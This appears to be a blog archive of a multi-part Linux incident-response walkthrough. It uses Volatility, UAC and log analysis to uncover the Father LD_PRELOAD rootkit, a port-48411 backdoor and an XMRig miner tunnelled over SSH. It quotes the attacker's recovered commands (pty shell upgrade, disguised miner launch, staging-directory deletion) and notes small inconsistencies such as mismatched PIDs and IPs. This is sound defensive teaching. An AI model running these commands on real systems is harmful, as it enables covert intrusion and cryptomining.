Linux Investigation (Part 3)

Please read Part 1 and Part 2 for additional background

We’ve actually done quite well reconstructing the major points of our intrusion scenario, but there are definitely some lingering questions. Let’s see if we can dive deeper into some of these artifacts.

LD_PRELOAD Rootkit Or Not?

It would be nice to positively identify libymv.so.3 as an LD_PRELOAD rootkit, rather than just referring to it as the “suspicious library”. Fortunately we have a memory image and can use Volatility to extract the library. We can use linux.elfs to dump all the objects associated with a PID. We believe that the SSH daemon was explicitly restarted to pick up libymv.so.3, so we’ll dump that process. As we saw in Part 2, that PID is 937.

(venv) $ mkdir dump-elfs-pid-937
(venv) $ vol -q -f memory_dump/avml.lime -o dump-elfs-pid-937 linux.elfs --pid 937 --dump
Volatility 3 Framework 2.27.1

PID Process Start End File Path File Output

937 sshd 0x55e3f52a9000 0x55e3f52b2000 /usr/sbin/sshd pid.937.sshd.0x55e3f52a9000.dmp
937 sshd 0x7f7da1093000 0x7f7da1098000 /usr/lib/x86_64-linux-gnu/libzstd.so.1.5.7 pid.937.sshd.0x7f7da1093000.dmp
937 sshd 0x7f7da115d000 0x7f7da1160000 /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.14.0 pid.937.sshd.0x7f7da115d000.dmp
937 sshd 0x7f7da120c000 0x7f7da1234000 /usr/lib/x86_64-linux-gnu/libc.so.6 pid.937.sshd.0x7f7da120c000.dmp
937 sshd 0x7f7da1400000 0x7f7da14f7000 /usr/lib/x86_64-linux-gnu/libcrypto.so.3 pid.937.sshd.0x7f7da1400000.dmp
937 sshd 0x7f7da1a3c000 0x7f7da1a3f000 /usr/lib/x86_64-linux-gnu/libz.so.1.3.1 pid.937.sshd.0x7f7da1a3c000.dmp
937 sshd 0x7f7da1a5e000 0x7f7da1a65000 /usr/lib/x86_64-linux-gnu/libselinux.so.1 pid.937.sshd.0x7f7da1a5e000.dmp
937 sshd 0x7f7da1aa5000 0x7f7da1aa7000 /usr/lib/x86_64-linux-gnu/libymv.so.3 pid.937.sshd.0x7f7da1aa5000.dmp
937 sshd 0x7f7da1ab3000 0x7f7da1ab5000 [vdso] pid.937.sshd.0x7f7da1ab3000.dmp
937 sshd 0x7f7da1ab5000 0x7f7da1ab6000 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 pid.937.sshd.0x7f7da1ab5000.dmp
937 sshd 0x7f7da1ade000 0x7f7da1ae9000 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 pid.937.sshd.0x7f7da1ade000.dmp

libymv.so.3 was extracted to dump-elfs-pid-937/pid.937.sshd.0x7f7da1aa5000.dmp. We could go full tilt at this and load it up for static analysis. But in the middle of an incident, I’m much more likely to do a first pass using “strings” and an internet search engine. Here are some of the more interesting strings I see in this sample

lpe_drop_shell
timebomb
backconnect
Enjoy the shell!
/tmp/silly.txt

Running those terms through my favorite search engine, my first hit was this useful list of rootkit IOCs. Apparently these strings are indicators for the Father rootkit.

If you look at the documentation for Father, it allows process, file, and directory hiding via a hard-coded GID. In our case this is apparently GID 7823 as we saw in Part 2. Father also has an accept() hook backdoor which is activated by to connecting to any network service from a hard-coded port. Based on the linux.sockstat output, this appears to be port 48411 in our case.

Father also has a PAM hook that steals user passwords and saves them to /tmp/silly.txt. UAC captured this file for us:

(venv) $ cat \[root\]/tmp/silly.txt 
100:1:password:worker

worker” is the password for the worker account. The rest of the values here are hard-coded in the Father source code and are meaningless.

So even without static analysis I’m willing to state with high confidence that libymv.so.3 is the Father LD_PRELOAD rootkit. And since I implanted it into the system, I can also state authoritatively that this is exactly what the library is.

Is top Really XMRig?

Let’s try a different approach to discover whether our suspicious “top” process is really XMRig as the command history we extracted in Part 2 suggests. linux.proc.Maps allows us to dump the memory space of a process.

(venv) $ mkdir dump-mem-pid-977
(venv) $ vol -q -f memory_dump/avml.lime -o dump-mem-pid-977 linux.proc.Maps --pid 977 --dump
Volatility 3 Framework 2.27.1

PID Process Start End Flags PgOff Major Minor Inode File Path File output

977 top 0x400000 0x401000 r-- 0x0 0 26 7 /dev/shm/kit/top (deleted) pid.977.vma.0x400000-0x401000.dmp
977 top 0x401000 0xa5f000 r-x 0x1000 0 26 7 /dev/shm/kit/top (deleted) pid.977.vma.0x401000-0xa5f000.dmp
977 top 0xa5f000 0xc40000 r-- 0x65f000 0 26 7 /dev/shm/kit/top (deleted) pid.977.vma.0xa5f000-0xc40000.dmp
[...]
(venv) $ grep -rlF xmrig dump-mem-pid-977/
dump-mem-pid-977/pid.977.vma.0xa5f000-0xc40000.dmp
(venv) $ strings -a dump-mem-pid-977/pid.977.vma.0xa5f000-0xc40000.dmp
[...]
Usage: xmrig [OPTIONS]
Network:
-o, --url=URL URL of mining server
-a, --algo=ALGO mining algorithm https://xmrig.com/docs/algorithms
--coin=COIN specify coin instead of algorithm
[...]

Finding the help text for the xmrig program in memory is conclusive enough for me. This is not a terribly surprising result, but it is nice to have additional confirmation.

Note that I tried a similar approach with linux.proc.Maps to try and recover the “config” file from the outbound SSH process (PID 975), but was unsuccessful. But while searching the memory strings for “:3333“, you can see some of the chatter from the XMRig process down the SSH tunnel.

[...]
4a747a5e140b7eb34933347c5154cb3d671bedc2e83b3a5e16f1603a4b660000
127.0.0.1:3333
method":"submit","params":{"id":"c1dcc2a9","job_id":"77","nonce":"ef000000","result":"982e4063bea92330be26b808c7d21d3fc349bc06f0c232fd673b7a827ab30000","algo":"rx/0"}}
"cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/yada","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
[...]

Timeline Analysis

I’m passionate about timeline analysis, and will often use it in the early stages of a case to find indicators. However, we’ve been very successful with the other evidence sources that UAC provided and timeline analysis hasn’t been a priority. But now we can use timeline analysis to fill in any details we might have missed.

First we need to create the timeline from the body file provided by UAC with the help of the Sleuthkit’s mactime tool (“mactime -d -y -b bodyfile/bodyfile.txt >bodyfile/timeline.csv“). Alternatively, you could use my ptt.sh script which creates a timeline that merges file system inform with security log information including user logins, Sudo commands, etc.

After loading the timeline into our CSV viewer of choice, we can jump to 2026-03-24 23:22:19– the time of the “worker” login for the session where the Father rootkit was implanted. As usual, there is a lot of noise in the timeline, but the timeline generally confirms events we have discovered already.

Recall from Part 1 that the logs showed us a brief SSH session at 23:23:48. This session was not logged in /var/log/wtmp, indicating that it most likely was a single command or scp session that was not allocated a PTY and did not spawn an interactive shell. The timeline shows that at 23:23:48 the last access time on the “/run/shm -> /dev/shm” symlink was updated. Does this mean that the SSH connection at 23:23:48 was how the /dev/shm/kit directory was staged? This is certainly a plausible explanation, but not conclusive.

We know that the Father rootkit exfiltrates passwords in the file /tmp/silly.txt. The timeline shows us that this file was created at 23:34:32. This is when the SOC logged in as user worker to collect system data with UAC. This is just further confirmation that the Father rootkit was operational on the system.

Wrapping Up

At this point, we have answers for the important questions for the scenario:

  1. Is the system compromised? Definitely yes!
  2. How did the attackers gain access to the system? They logged in as user “worker“, using the account password “worker“. This password was easily guessable, or it may have been disclosed or stolen. User “worker” had unlimited Sudo access, so privilege escalation was trivial.
  3. Why is there unencrypted traffic on port 22/tcp? The attacker installed a rootkit that creates a backdoor in any networked service on the system, giving any user connecting from source port 48411/tcp a root shell on the system.
  4. What is consuming CPU on the system? Process ID 975 is the XMRig cryptocurrency miner running under the executable name “top“. This process is connecting out through an SSH tunnel to 192.168.5.95. This system is now in scope and must be investigated.
  5. Why can’t the SOC see what is happening on the system? The rootkit installed by the attacker is hiding multiple processes from the attacker’s backdoor session, including the cryptocurrency miner.

Here is our final timeline of important events during the incident:

23:22:19    User "worker" logs in with password from jump host (192.168.4.35) port 48364 [logs]
23:23:34 User "worker" uses sudo to execute root shell [logs]
23:23:48 Command-only/scp as user "worker" from jump host port 55504 [logs]
23:23:48 atime update on /dev/shm symlink, possible rootkit staging [bodyfile]
23:24:51 Father rootkit installed as /usr/lib/x86_64-linux-gnu/libymv.so.3 [bodyfile]
23:25:09 /etc/ld.so.preload created, points to .../libymv.so.3 [chkrootkit]
23:25:19 SSH daemon restarted [logs]
23:26:07 Unencrypted connect from 192.168.4.35 port 48411 via Father rootkit hook [memory]
23:26:22 python3 execution to promote raw shell [memory]
23:26:22 Hidden bash process started from python pty.spawn() [memory]
23:27:16 User "worker" SSH session from jump host port 48364 ends [logs]
23:27:51 /dev/shm/kit/xmrig renamed to "top" [memory]
23:28:17 ssh to 192.168.5.95 with tunnel on 3333/tcp [memory]
23:29:09 "top" process (renamed xmrig) started, comms via SSH tunnel [memory]
23:29:19 /dev/shm/kit removed [memory]
23:34:32 SOC logs in to start collecting data with UAC [logs]
23:34:32 Father rootkit stores "worker" password in /tmp/silly.txt [bodyfile]

Those of you who conducted your own investigation may have been thrown off by earlier artifacts left behind by my aborted attempts to create the scenario data. For example, there are login failures as user “worker” that could be construed as a brute force attack against this account, system crashes, and errors with libymv.so.3. My intention was that the scenario started with the login at 23:22:19, but kudos to those of you who found the earlier artifacts and invented plausible explanations for them.

Some submissions noted the fact that the kernel taint warning was triggered and speculated about a possible kernel rootkit. But only one submission actually ran down the source of the taint warning and realized it was due to the VirtualBox assistant and not enemy action. This is serious investigative dedication! Bravo!

One last part of this series is yet to come. I will be walking through what I actually did to create the scenario activity so that you can compare your answers with what really happened. In the meantime, don’t forget to check out the reports from the contest winners.

Linux Investigation (Part 2)

Please read the previous installment of this investigation for additional background.

Having identified a potential LD_PRELOAD rootkit, I’m very curious to discover what the memory dump from the system can tell us. Note that before you can begin analyzing the memory for yourself you will need to (a) install Volatility, and (b) install a Linux profile that will work for this memory dump in .../volatility3/symbols/linux.

Process Information

One approach for finding suspicious processes is to look at the process hierarchy with linux.pstree. The Linux process hierarchy is usually rather flat, so interactive sessions tend to stand out:

(venv) $ vol -q -f memory_dump/avml.lime linux.pstree
[...]
* 0x8c7cc67e1980 937 937 1 sshd
** 0x8c7cc8278000 939 939 937 sh
*** 0x8c7cc67e4c80 940 940 939 python3
**** 0x8c7cc6011980 941 941 940 bash
***** 0x8c7cc6014c80 975 975 941 ssh
** 0x8c7cc81b1980 1005 1005 937 sshd-session
*** 0x8c7cc08b8000 1047 1047 1005 sshd-session
**** 0x8c7cc8354c80 1064 1064 1047 bash
***** 0x8c7cc351b300 1076 1076 1064 sudo
****** 0x8c7cc3859980 1078 1078 1076 sudo
******* 0x8c7cc039cc80 1079 1079 1078 bash
******** 0x8c7da0131980 119319 119319 1079 avml
[...]

The second hierarchy starting with PID 1005 is what SSH sessions normally look like: two sshd-session processes (privilege separation), then the login shell. The double sudo is an interesting wrinkle, but apparently an artifact of this user doing “sudo -s” to start a root shell rather than just “sudo bash“. Then we have the bash shell itself, where the user is running avml to grab the memory dump we are currently reviewing. This is more or less as expected.

The process hierarchy starting with PID 939, however, is just plain weird. The shell process with PID 939 is spawned directly out of the master SSH daemon, PID 937. This suggests some sort of exploit against the SSH daemon itself. Next comes a Python process (PID 940). Could this be the Python command from the original SOC report? Certainly PID 940 spawned a bash shell (PID 941), which matches what the SOC told us. That bash shell ran “ssh“– the SSH client program. What is going on here?

We can get more detail on these processes from the linux.psaux plugin:

(venv) $ vol -q -f memory_dump/avml.lime linux.psaux
[...]
939 937 sh /bin/sh
940 939 python3 python3 -c import pty; pty.spawn("/bin/bash")
941 940 bash /bin/bash
[...]
975 941 ssh ssh -F config ymv
[...]

That’s definitely the Python command line the SOC reported to us. Apparently whatever is happening in the PID 939 shell is not happening inside of an encrypted session. This also tends to point towards some sort of pre-encryption and therefore pre-authentication compromise of the master SSH daemon. Recall from our log analysis in the last installment that the /etc/ld.so.preload file containing the path of the suspected rootkit library was created immediately before the SSH daemon was restarted. Are we looking at rootkit functionality for the SSH daemon compromise?

It’s also worth considering that ssh command line (PID 975). “-F config” means read client options from a file called “config“, but where was that file dropped to disk? Also, the SOC and the system admins for the machine have no idea what the host “ymv” is. It does not resolve within this network. Best guess is that the hostname “ymv” refers to configuration in the “config” file, wherever that ended up.

Command History From Memory

UAC didn’t find command history on disk, but the attacker’s bash shell was still active at the time the memory image was taken. So that command history should be in the memory dump.

(venv) $ vol -q -f memory_dump/avml.lime linux.bash --pid 941
Volatility 3 Framework 2.27.1

PID Process CommandTime Command

941 bash 2026-03-24 23:26:26.000000 UTC rest
941 bash 2026-03-24 23:26:30.000000 UTC reset
941 bash 2026-03-24 23:26:44.000000 UTC echo $SHELL
941 bash 2026-03-24 23:26:54.000000 UTC id
941 bash 2026-03-24 23:27:25.000000 UTC cd /dev/shm/kit
941 bash 2026-03-24 23:27:26.000000 UTC ls
941 bash 2026-03-24 23:27:51.000000 UTC mv xmrig top
941 bash 2026-03-24 23:27:59.000000 UTC export PATH=.:$PATH
941 bash 2026-03-24 23:28:17.000000 UTC ssh -F config ymv
941 bash 2026-03-24 23:28:28.000000 UTC bg
941 bash 2026-03-24 23:29:09.000000 UTC top -o 127.0.0.1:3333 -B
941 bash 2026-03-24 23:29:15.000000 UTC cd ..
941 bash 2026-03-24 23:29:19.000000 UTC rm -rf kit
941 bash 2026-03-24 23:29:24.000000 UTC ps -ef | grep top
941 bash 2026-03-24 23:29:36.000000 UTC ls

This shell history is extremely useful. After what is apparently an initial typo, the user executes a “reset” command, which is part of the typical recipe for elevating a raw shell to fully interactive via the Python pty.spawn() method. Our user then checks which shell they are in (“echo $SHELL“) and what user they are running as (“id“). This is classic post-exploit behavior: a typical user in a normal interactive session would not need to run these commands.

The user then changes to a directory named /dev/shm/kit. This is not a typical directory on this system, so where did it come from? The fact that it was staged in /dev/shm–a memory-based file system–is suspicious. This would be a good place for an attacker to stage files that they did not want to write to the system’s local disk.

Inside this directory was apparently a file named “xmrig“. XMRig is a popular Monero cryptocurrency miner. The user renames this file to “top” and later executes this “top” program from the /dev/shm/kit directory. “export PATH=.:$PATH” adds the current working directory to the front of the search path, followed later by “top -o 127.0.0.1:3333 -B” to execute the program. Note that the command line arguments to this “top” program match typical xmrig arguments– “-o 127.0.0.1:3333” to specify the mining infrastructure to connect to, and “-B” to run in the background as a daemon.

After starting the renamed xmrig, we see the user remove /dev/shm/kit (“cd ..“, “rm -rf kit“). This will not impact the running processes that were started here, but will make it more difficult for inexperienced investigators to find these files. We also see the user checking that their “top” program is still running or perhaps that it is invisible (“ps -ef | grep top“), and making sure that /dev/shm/kit is gone (“ls“).

But what is happening on localhost 3333/tcp? In between the “mv” command to rename the binary and executing the renamed xmrig as “top” we see “ssh -F config ymv” (later set to run in the background with “bg“) which we also saw in the linux.psaux output. Note that this command history implies that the “config” file was in /dev/shm/kit, now deleted.

It seems reasonable to assume that 127.0.0.1:3333 is an SSH tunnel. But can we find artifacts in memory to prove that?

Network Details

The linux.sockstat plugin should give us some insight into the network behavior on the system:

(venv) $ vol -q -f memory_dump/avml.lime linux.sockstat | grep -F 3333 | sort -u
4026531840 libuv-worker 977 979 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 libuv-worker 977 980 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 libuv-worker 977 981 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 libuv-worker 977 982 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 ssh 975 975 4 0x8c7cc404a900 AF_INET6 STREAM TCP ::1 3333 :: 0 LISTEN -
4026531840 ssh 975 975 5 0x8c7cc4043900 AF_INET STREAM TCP 127.0.0.1 3333 0.0.0.0 0 LISTEN -
4026531840 ssh 975 975 6 0x8c7cc405e880 AF_INET STREAM TCP 127.0.0.1 3333 127.0.0.1 59182 ESTABLISHED -
4026531840 top 977 977 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 top 977 978 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 top 977 987 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 top 977 988 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 top 977 989 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -
4026531840 top 977 990 17 0x8c7cc405c280 AF_INET STREAM TCP 127.0.0.1 59182 127.0.0.1 3333 ESTABLISHED -

The suspicious SSH process that was started (PID 975) is definitely listening on 127.0.0.1:3333. There is no “-L” option showing on the command line, so we presume the tunnel configuration is in the “config” file mentioned on the command line (“-F config“).

We can also see the “top” process, which is the renamed xmrig binary, actively talking on this port. This is consistent with the “-o 127.0.0.1:3333” option we saw in the command history. XMRig uses libuv for thread management, which is where the libuv-worker processes come from. Note that the top and libuv-worker entries share the same PID (977 in the third column of output) but different thread IDs (fourth column of output above).

But where is the SSH process connecting to? Let’s check the linux.sockstat output again:

(venv) $ vol -q -f memory_dump/avml.lime linux.sockstat | awk '$3 == "975"'
4026531840 ssh 975 975 3 0x8c7cc405cc00 AF_INET STREAM TCP 192.168.4.22 33440 192.168.5.95 22 ESTABLISHED -
4026531840 ssh 975 975 4 0x8c7cc404a900 AF_INET6 STREAM TCP ::1 3333 :: 0 LISTEN -
4026531840 ssh 975 975 5 0x8c7cc4043900 AF_INET STREAM TCP 127.0.0.1 3333 0.0.0.0 0 LISTEN -
4026531840 ssh 975 975 6 0x8c7cc405e880 AF_INET STREAM TCP 127.0.0.1 3333 127.0.0.1 59182 ESTABLISHED -

The outbound connection is to 192.158.5.95. We understood from the initial SOC report that all access to the system we are investigating is supposed to go through a jump host at 192.168.4.35, so this is a new system we have not heard of. The IP address is internal, and we will need to investigate this system to find out whether it too has been compromised. The scope of our investigation is growing!

We can also use linux.sockstat to investigate where our mysterious unencrypted SSH traffic is originating from. Here I am focusing in on only the activity related to the initial “sh” process (PID 939) that was created:

(venv) $ vol -q -f memory_dump/avml.lime linux.sockstat | awk '$3 == "939"'
4026531840 sh 939 939 0 0x8c7cc4059300 AF_INET STREAM TCP 192.168.4.22 22 192.168.4.35 48411 ESTABLISHED -
4026531840 sh 939 939 1 0x8c7cc4059300 AF_INET STREAM TCP 192.168.4.22 22 192.168.4.35 48411 ESTABLISHED -
4026531840 sh 939 939 2 0x8c7cc4059300 AF_INET STREAM TCP 192.168.4.22 22 192.168.4.35 48411 ESTABLISHED -
4026531840 sh 939 939 8 0x8c7cc4059300 AF_INET STREAM TCP 192.168.4.22 22 192.168.4.35 48411 ESTABLISHED -

It appears that this connection originated from the jump host system, 192.168.4.35 (source port 48411).

Detailed Process Information

The linux.pslist plugin will give us process start times as well as UID and GID info for all of our suspicious processes. The linux.pslist output is quite busy, so allow me to summarize the important pieces of info:

Process   PID  PPID  UID  GID    Started (UTC)
sh 939 937 0 7823 2026-03-24 23:26:07
python3 940 939 0 7823 2026-03-24 23:26:22
bash 941 940 0 7823 2026-03-24 23:26:22
ssh 975 941 0 7823 2026-03-24 23:28:32
top 977 1 0 7823 2026-03-24 23:29:24

One item that jumps out is that all of the processes are running as root (UID zero), but with the GID 7823. No other processes in the output are using this GID and the GID does not appear in the /etc/group file captured by UAC ([root]/etc/group). Rootkits will often use a group ID value to mark processes, files, and directories that should be hidden by the rootkit. That may be what is happening here.

Also note that the PPID of the “top” process is 1, which is systemd. This is an artifact of the “-B” option that was used to invoke the program. This option tells the process to run in the background like any other daemon process. In doing so the “top” process disassociates itself from the parent shell that spawned it, inheriting PPID 1. This is also why the “top” process did not appear in linux.pstree process hierarchy while the “ssh” command did.

Note that the start times for the “ssh” and “top” processes reported by linux.pslist differ from the timestamps from the command history. The linux.pslist times are approximately 15 seconds later than the corresponding command history timestamps. I have no explanation for this discrepancy, but will stick with the timestamps from the command history for consistency.

Status Check And Next Steps

Our timeline is filling in nicely. I’ve added a note at the end of each item to remind us where the information comes from:

23:22:19    User "worker" logs in with password from jump host (192.168.4.35) port 48364 [logs]
23:23:34 User "worker" uses sudo to execute root shell [logs]
23:23:48 Command-only/scp as user "worker" from jump host port 55504 [logs]
23:24:51 /usr/lib/x86_64-linux-gnu/libymv.so.3 created [bodyfile]
23:25:09 /etc/ld.so.preload created, points to .../libymv.so.3 [chkrootkit]
23:25:19 SSH daemon restarted [logs]
23:26:07 Unencrypted connect from 192.168.4.35 port 48411 spawns hidden sh (PID 939) [memory]
23:26:22 python3 execution to promote raw shell [memory]
23:26:22 Hidden bash process started from python pty.spawn() [memory]
23:27:16 User "worker" SSH session from jump host port 48364 ends [logs]
23:27:51 /dev/shm/kit/xmrig renamed to "top" [memory]
23:28:17 ssh to 192.168.5.95 with tunnel on 3333/tcp [memory]
23:29:09 "top" process (renamed xmrig) started, comms via SSH tunnel [memory]
23:29:19 /dev/shm/kit removed [memory]

From the timeline it appears that the suspicious library was planted during the original “worker” login session that started at 23:22:19. But once the hidden session was established and promoted via pty.spawn(), the legitimate login closed down. The hidden session was responsible for starting the SSH tunnel to 192.168.5.95 and running the renamed XMRig.

But there are still so many questions. How did the /dev/shm/kit directory and the suspicious library get onto the system in the first place and when? Can we recover the any of the suspect files– “libymv.so.3“, “top“, and the “config” file used for the SSH connection? Is “libymv.so.3” really an LD_PRELOAD rootkit as suspected? What else did the attacker accomplish on the system? More investigation in the next installment!

Linux Investigation (Part 1)

I recently posted a Linux scenario that I had mocked up and asked for people to submit write-ups for judging. The winners have now been announced. Congratulations to all who participated!

I also wanted to provide an analysis of my own. Obviously, I know exactly what happened because I did everything. But I’m going to approach this investigation as if I were coming in cold, without any prior knowledge.

The scenario starts with an alert from the SOC containing two important pieces of information:

  • Unencrypted traffic on port 22/tcp, specifically the string “python3 -c 'import pty; pty.spawn("/bin/bash")'
  • Heavy CPU usage but no process can be seen consuming the CPU

We have a UAC collection from the machine, including a full memory dump.

Initial Triage

“Heavy CPU usage but no process can be seen consuming the CPU” sounds a lot like a rootkit hiding processes to me, but let’s just confirm the SOC finding first. UAC collects the output from “top -b -n1” (live_response/process/top_-b_-n1.txt), and here’s the first part of that file:

top - 19:38:21 up 15 min,  1 user,  load average: 4.38, 3.44, 1.81
Tasks: 132 total, 1 running, 131 sleeping, 0 stopped, 0 zombie
%Cpu(s): 97.7 us, 2.3 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
MiB Mem : 7947.4 total, 5206.4 free, 2780.6 used, 194.6 buff/cache
MiB Swap: 1101.0 total, 1097.7 free, 3.3 used. 5166.7 avail Mem

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1 root 20 0 23812 14824 10756 S 0.0 0.2 0:00.70 systemd
2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
3 root 20 0 0 0 0 S 0.0 0.0 0:00.00 pool_wo+

[...]

Looking at line #3, the CPU is indeed maxed out. The process listing below the header information should be sorted by CPU utilization, but we see nothing that remotely accounts for the amount of CPU being consumed. Seems like the SOC made a good read here.

UAC has some modules that look for common rootkit indicators, so we look in the “chkrootkit” directory in the UAC output and hit pay dirt (for those of you playing along at home, the bodystat.sh script is available from my GitHub):

$ ls chkrootkit/
etc_ld_so_preload.txt stat_etc_ld_so_preload.txt
$ cat chkrootkit/etc_ld_so_preload.txt
/lib/x86_64-linux-gnu/libymv.so.3
$ cat chkrootkit/stat_etc_ld_so_preload.txt
0|/etc/ld.so.preload|837578|-rw-r--r--|0|0|34|1774394719|1774394709|1774394709|1774394709
$ cat chkrootkit/stat_etc_ld_so_preload.txt | bodystat.sh
File: /etc/ld.so.preload
Size: 34 UID: 0 GID: 0 Inode: 837578
Access: 2026-03-24 23:25:19
Modify: 2026-03-24 23:25:09
Change: 2026-03-24 23:25:09
Birth: 2026-03-24 23:25:09

$ grep -F lib/x86_64-linux-gnu/libymv.so.3 bodyfile/bodyfile.txt | bodystat.sh
File: /usr/lib/x86_64-linux-gnu/libymv.so.3
Size: 24024 UID: 0 GID: 0 Inode: 715378
Access: 2026-03-24 23:25:19
Modify: 2026-03-24 23:24:51
Change: 2026-03-24 23:24:51
Birth: 2026-03-24 23:24:51

We have a suspicious library in /etc/ld.so.preload containing the library path /usr/lib/x86_64-linux-gnu/libymv.so.3. This libymv.so.3 file was created at 2026-03-24 23:24:51 UTC and /etc/ld.so.preload at 23:25:09.

There are many directions our investigation could go from this point, but I got curious to see if we could tie those file creation times to a particular login session on the machine. A quick look at live_response/system/last_-i.txt in the UAC data shows the following:

worker   pts/0        192.168.4.35     Tue Mar 24 19:34 - still logged in
worker pts/0 192.168.4.35 Tue Mar 24 19:22 - 19:27 (00:04)
reboot system boot 6.12.74+deb13+1- Tue Mar 24 19:21 - still running
[...]

There’s a time discrepancy here. If we assume that the session starting at 19:34 is where the UAC collection was made, this predates the arrival of the suspicious library by four hours. I suspect a local time zone issue.

$ ls -l \[root\]/etc/localtime
lrwxrwxrwx 1 hal hal 36 Mar 24 15:48 '[root]/etc/localtime' -> /usr/share/zoneinfo/America/New_York

The “last” output will be in the default time zone for the machine, which is apparently US/Eastern time. That’s four hours earlier than UTC at this time of year.

With that in mind, the creation times on our suspicious files line up nicely with the four minute session by user “worker” from 23:22 – 23:27 UTC (represented in the output above as 19:22 – 19:27). Unfortunately, UAC did not capture a .bash_history file for either the “worker” user or the “root” account. Anti-forensics is a possibility worth noting, but for now we don’t have any useful command history.

Looking at the security logs should provide more details about that login session. The only logs available are the Systemd journal, so it’s time to work some magic with journalctl.

$ journalctl -D \[root\]/var/log/journal/ -q -o short-iso --facility=auth,authpriv | grep -vE '(pam_unix|systemd-logind)'
[...]
2026-03-24T23:22:19+0000 vbox sshd-session[834]: Accepted password for worker from 192.168.4.35 port 48364 ssh2
2026-03-24T23:23:34+0000 vbox sudo[910]: worker : TTY=pts/0 ; PWD=/home/worker ; USER=root ; COMMAND=/bin/bash
2026-03-24T23:23:48+0000 vbox sshd-session[914]: Accepted password for worker from 192.168.4.35 port 55504 ssh2
2026-03-24T23:23:48+0000 vbox sshd-session[923]: Received disconnect from 192.168.4.35 port 55504:11: disconnected by user
2026-03-24T23:23:48+0000 vbox sshd-session[923]: Disconnected from user worker 192.168.4.35 port 55504
2026-03-24T23:25:19+0000 vbox sshd[801]: Received signal 15; terminating.
2026-03-24T23:25:19+0000 vbox sshd[937]: Server listening on 0.0.0.0 port 22.
2026-03-24T23:25:19+0000 vbox sshd[937]: Server listening on :: port 22.
2026-03-24T23:27:16+0000 vbox sshd-session[834]: syslogin_perform_logout: logout() returned an error
2026-03-24T23:27:16+0000 vbox sshd-session[873]: Received disconnect from 192.168.4.35 port 48364:11: disconnected by user
2026-03-24T23:27:16+0000 vbox sshd-session[873]: Disconnected from user worker 192.168.4.35 port 48364
[...]

The “worker” user logs in (with a password) at 23:22:19, and uses sudo to get a root shell at 23:23:34.

But at 23:23:48, we see a second SSH session for “worker” that did not appear in the “last” output. Typically this means that the session did not spawn an interactive shell and was not allocated a PTY. That would indicate that the session only ran a single command specified by the remote user on their command line, or was possibly an scp. This idea is supported by the fact that the session connected and disconnected in the same second.

At 23:25:19 we see the SSH server restarted. Curiouser and curiouser.

What We Know So Far

At this point we’re starting to build a timeline of the incident:

23:22:19    User "worker" logs in with password from jump host (192.168.4.35) port 48364
23:23:34 User "worker" uses sudo to execute /bin/bash (root shell)
23:23:48 Command-only/scp as user "worker" from jump host (port 55504)
23:24:51 /usr/lib/x86_64-linux-gnu/libymv.so.3 created
23:25:09 /etc/ld.so.preload created (points to .../libymv.so.3)
23:25:19 SSH daemon restarted
23:27:16 User "worker" SSH session from jump host ends (source port 48364)

With everything laid out like this, it becomes obvious that the /etc/ld.so.preload file was created immediately before the SSH daemon was restarted. Since the only person operating on the system at the time was our suspected attacker, it is reasonable to assume that the SSH daemon was restarted so that it would pick up the suspicious libymv.so.3 library.

libymv.so.3 certainly has all the indications of being an LD_PRELOAD type rootkit. Memory analysis is a good path for further investigation, so we will pick up there in our next installment.

Fun With volshell

When triaging a collection of memory images, I often find myself running multiple Volatility plugins on each image. Typically I do this by shell script, calling each plugin individually and saving the output in files. The problem with this approach is that Volatility has to re-parse the memory image each time my script calls a new plugin. This adds a lot of overhead and time. I started wondering if I could leverage volshell to run multiple plugins so that I wouldn’t have to pay the startup cost each time.

volshell Basics

volshell is an interactive shell environment for exploring a memory image. Explaining all the features of volshell would fill a book, so we’re just going to focus on the basics of starting up volshell and running plugins.

Starting volshell is straightforward. Specify a memory image with “-f” and the OS it comes from with “-w“, “-m“, or “-l” (Windows, MacOS, Linux, respectively). If we don’t want the progress meter as it’s ingesting the memory image, we can add “-q” (“quiet” mode).

$ volshell -f avml.lime -l -q
Volshell (Volatility 3 Framework) 2.27.1
Readline imported successfully

Call help() to see available functions

Volshell mode : Linux
Current Layer : layer_name
Current Symbol Table : symbol_table_name1
Current Kernel Name : kernel

(layer_name) >>>

As the startup text suggests, help is available at any time by running the help() function:

(layer_name) >>> help()

Methods:
...
* dpo, display_plugin_output
Displays the output for a particular plugin (with keyword arguments)
...

volshell methods generally have both long and abbreviated forms. For example, we’ll be using the display_plugin_output() method to run plugins. But rather than type that long string each time, we can just use dpo() instead.

For a simple example, let’s run the linux.ip.Addr plugin via volshell:

(layer_name) >>> from volatility3.plugins.linux import ip
(layer_name) >>> dpo(ip.Addr, kernel = self.config['kernel'])

NetNS Index Interface MAC Promiscuous IP Prefix Scope Type State

